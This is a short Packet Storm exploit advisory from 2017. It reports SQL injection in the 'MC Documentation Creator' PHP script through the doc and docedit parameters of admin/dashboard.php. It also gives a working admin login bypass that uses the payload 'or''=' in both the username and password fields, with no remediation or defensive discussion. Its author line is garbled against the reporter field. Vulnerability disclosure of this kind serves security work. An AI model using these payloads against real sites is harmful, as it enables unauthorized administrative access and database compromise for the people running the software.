MC Documentation Creator SQL Injection

2017-01-15T00:00:00
ID PACKETSTORM:140496
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-01-15T00:00:00

Description

                                        
                                            `# # # # #   
# Vulnerability: SQL Injection Web Vulnerability  
# Date: 15.01.2017  
# Vendor Homepage: http://microcode.ws/  
# Script Name: MC Documentation Creator  
# Script Buy Now: http://microcode.ws/product/mc-documentation-creator-php-script/3890  
# Author: Adeghsan Aencan  
# Author Web: http://ihsan.net  
# Mail : ihsan[beygir]ihsan[nokta]net  
# # # # #   
# SQL Injection/Exploit :  
# http://localhost/[PATH]/admin/dashboard.php?doc=[SQL]  
# http://localhost/[PATH]/admin/dashboard.php?docedit=[SQL]  
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.  
#   
# Admin Login Bypass  
# http://localhost/[PATH]/admin/ and set Usename:'or''=' and Password to 'or''=' and hit enter.  
# # # # #  
  
`